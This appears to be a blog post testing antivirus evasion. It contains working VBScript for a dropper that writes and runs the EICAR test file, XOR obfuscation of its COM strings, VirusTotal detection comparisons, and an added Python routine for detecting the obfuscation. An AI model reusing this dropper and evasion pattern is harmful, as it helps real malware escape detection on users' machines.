In this antivirus challenge I will start with something simple: a VBS trojan dropper, to which I then apply string encryption to two particular strings, "Scripting.FileSystemObject" and "WScript.Shell". Afterwards I will compare antivirus detection of the original trojan against the version with encrypted strings.
Here's the trojan code:
```vbscript
' Payload: the EICAR test string stored as comma-separated hex bytes.
' A token longer than two characters is run-length encoded:
' "432" means byte &H43 ("C") repeated &H2 times.
t="58,35,4F,21,50,25,40,41,50,5B,34,5C,50,5A,58,35,34,28,50,5E,29,37,432,29,37,7D,24,45,49,43,41,52,2D,53,54,41,4E,44,41,52,44,2D,41,4E,54,49,56,49,52,55,53,2D,54,45,53,54,2D,46,49,4C,45"
t=t&",21,24,48,2B,48,2A"
tmp = Split(t, ",")
Set fso = CreateObject("Scripting.FileSystemObject")
' GetSpecialFolder(0) is the Windows folder, so this needs admin rights;
' a real dropper would use GetSpecialFolder(2), the temp folder.
pth = fso.GetSpecialFolder(0) & "\eicar.com"
' Second argument is Overwrite. The original passed the undefined name ForWriting,
' which VBScript treats as Empty/False, so the script failed if the file already existed.
Set f = fso.CreateTextFile(pth, True)
For i = 0 To UBound(tmp)
    l = Len(tmp(i))
    b = Int("&H" & Left(tmp(i), 2))
    If l > 2 Then
        ' run-length token: the characters after the first two are the repeat count
        r = Int("&H" & Mid(tmp(i), 3, l))
        For j = 1 To r
            f.Write Chr(b)
        Next
    Else
        f.Write Chr(b)
    End If
Next
f.Close
WScript.CreateObject("WScript.Shell").run(pth)
```

The trojan drops the EICAR test file and executes it. In a real attack the dropped file could be any malware; EICAR is used here so the test is harmless and every engine is expected to flag the payload.
For the encryption function I will use a simple XOR routine keyed with the single character "0" (0x30):
```vbscript
' XOR every character of sText with the one-character key "0" (&H30).
' XOR is symmetric, so the same routine both encrypts and decrypts.
Function CryptXor(sText)
    Dim I
    Dim RetStr
    Dim CharUse, CharPwd
    For I = 1 To Len(sText)
        CharUse = Mid(sText, I, 1)
        ' (I Mod Len(key)) + 1 walks a repeating key; with a one-character key it is always 1
        CharPwd = Mid("0", (I Mod Len("0")) + 1, 1)
        RetStr = RetStr & Chr(Asc(CharUse) Xor Asc(CharPwd))
    Next
    CryptXor = RetStr
End Function
```

With the encryption applied, two lines change:
```vbscript
Set fso = CreateObject(CryptXor("cSBY@DY^W" & Chr(30) & "vY\UcICDU]" & Chr(127) & "RZUSD"))
```

and

```vbscript
WScript.CreateObject(CryptXor("gcSBY@D" & Chr(30) & "cXU\\")).run(pth)
```

Note that XOR with 0x30 maps "." to byte 0x1E and "O" to 0x7F (DEL), neither of which is printable. In the original source these were raw bytes inside the string literals; they do not survive copy and paste, so they are written out with Chr() here. Now I will scan the original and the encrypted version. Here are the results:
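The following Python script is an added example and not part of the original post. It works the same single-byte XOR from both sides: it reports which of the 255 one-character keys keep the two ProgIDs printable (the post's key "0" is not one of them, which is why the two literals above needed Chr()), and it recovers the ProgIDs from a script by trying every key against the text, the same brute force that YARA's `xor` string modifier performs. The sample script text is constructed here; it reproduces the two modified lines with key "0" and the raw control bytes 0x1E and 0x7F embedded, as they were in the post's source.

```python
# The two COM ProgIDs the dropper needs; the same strings the post obfuscates.
SENSITIVE_PROGIDS = ("Scripting.FileSystemObject", "WScript.Shell")

# Printable ASCII, 0x20..0x7E: the only bytes that can be typed into a VBScript literal.
PRINTABLE = {chr(c) for c in range(0x20, 0x7F)}


def xor_str(text: str, key: str) -> str:
    """Repeating-key XOR over character codes, the scheme CryptXor implements.
    The post uses the one-character key "0", so every byte is XORed with 0x30."""
    return "".join(chr(ord(c) ^ ord(key[i % len(key)])) for i, c in enumerate(text))


def unprintable_positions(text: str) -> list:
    """Indexes of characters outside printable ASCII. Such bytes are silently lost
    when a script is copied or published, which is what happened to "." and "O"."""
    return [i for i, c in enumerate(text) if c not in PRINTABLE]


def printable_single_byte_keys(plaintexts=SENSITIVE_PROGIDS) -> list:
    """Single-byte keys (1..255) for which every plaintext XORs to printable ASCII
    only, i.e. keys whose output can be pasted into a script literal verbatim."""
    return [k for k in range(1, 256)
            if all(not unprintable_positions(xor_str(p, chr(k))) for p in plaintexts)]


def recover_progids(script_text: str) -> dict:
    """Detection side: for every sensitive ProgID and every single-byte key, compute
    the XORed form and look for it in the script text. Returns {progid: key};
    key 0 means the ProgID appears in plaintext."""
    hits = {}
    for progid in SENSITIVE_PROGIDS:
        for k in range(256):
            if xor_str(progid, chr(k)) in script_text:
                hits[progid] = k
                break
    return hits


# Constructed sample (not the post's file): the two modified lines with key "0",
# including the raw control bytes 0x1E and 0x7F that the post's source contained.
SAMPLE_OBFUSCATED = (
    'Set fso = CreateObject(CryptXor("cSBY@DY^W\x1evY\\UcICDU]\x7fRZUSD"))\n'
    'WScript.CreateObject(CryptXor("gcSBY@D\x1ecXU\\\\")).run(pth)\n'
)
# Constructed sample of the unobfuscated line, for comparison.
SAMPLE_PLAIN = 'Set fso = CreateObject("Scripting.FileSystemObject")\n'

if __name__ == "__main__":
    print("unprintable offsets with key 0x30:",
          unprintable_positions(xor_str("Scripting.FileSystemObject", "0")))
    print("keys that keep both ProgIDs printable:", printable_single_byte_keys())
    print("obfuscated sample:", recover_progids(SAMPLE_OBFUSCATED))
    print("plain sample:", recover_progids(SAMPLE_PLAIN))
```

The substring search is cheap (256 keys times two strings) and is exactly what a YARA rule with the `xor` modifier does for you. It is defeated as soon as the literal is split with `&` or built from `Chr()` calls, as in the corrected lines above, which is why static string matching on scripts only goes so far and runtime inspection of the decoded string (for example through AMSI in Windows Script Host) is the more reliable hook.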
Original trojan: https://www.virustotal.com/#/file/70887a9f231d4289ccf96b6486393f0a43e5162c0e19a36b978c8b5bd6eec1f2/detection

Detected by (20 engines): Ad-Aware, ALYac, Arcabit, Avast, AVG, Baidu, BitDefender, ClamAV, DrWeb, Emsisoft, eScan, ESET-NOD32, F-Secure, GData, Kaspersky, MAX, NANO-Antivirus, Yandex, Zillya, ZoneAlarm

Not detected by (48 engines): AegisLab, AhnLab-V3, Antiy-AVL, Avast Mobile Security, Avira, Babable, Bkav, CAT-QuickHeal, CMC, Cyren, F-Prot, Fortinet, Ikarus, Jiangmin, K7AntiVirus, K7GW, Kingsoft, Malwarebytes, McAfee, McAfee-GW-Edition, Microsoft, Panda, Qihoo-360, Rising, Sophos AV, SUPERAntiSpyware, Symantec, TACHYON, Tencent, TheHacker, TrendMicro, TrendMicro-HouseCall, VBA32, VIPRE, ViRobot, Zoner, Alibaba, CrowdStrike Falcon, Cybereason, Cylance, eGambit, Endgame, Palo Alto Networks, SentinelOne, Sophos ML, Symantec Mobile Insight, Trustlook, Webroot

Encrypted trojan: https://www.virustotal.com/#/file/a40b07d7fa2a7a11d5be19ac7f151cfe7dd65b2168fa4f0f6f24de848b89ff45/detection

Detected by (16 engines): Ad-Aware, ALYac, Arcabit, Avast, AVG, Baidu, BitDefender, Emsisoft, eScan, F-Secure, GData, Kaspersky, MAX, NANO-Antivirus, Zillya, ZoneAlarm

Four engines that detected the original no longer detect the encrypted version: ClamAV, DrWeb, ESET-NOD32, Yandex.

As the VirusTotal reports show, most of the engines that still flag the sample identify it as EICAR, because the script contains the hex-encoded EICAR file. Their detection is keyed on the payload rather than on the dropper logic, which is why XOR-encoding the two ProgIDs does not affect them.

About the detection rate: engines that miss even the original sample have weak script-based malware detection. ClamAV, DrWeb, ESET-NOD32 and Yandex do look at the script itself, but their signatures are bypassed by something as trivial as XOR-encoding two strings.

Next time I will encrypt the hex code of the EICAR file as well, and we will see whether that technique bypasses your antivirus protection.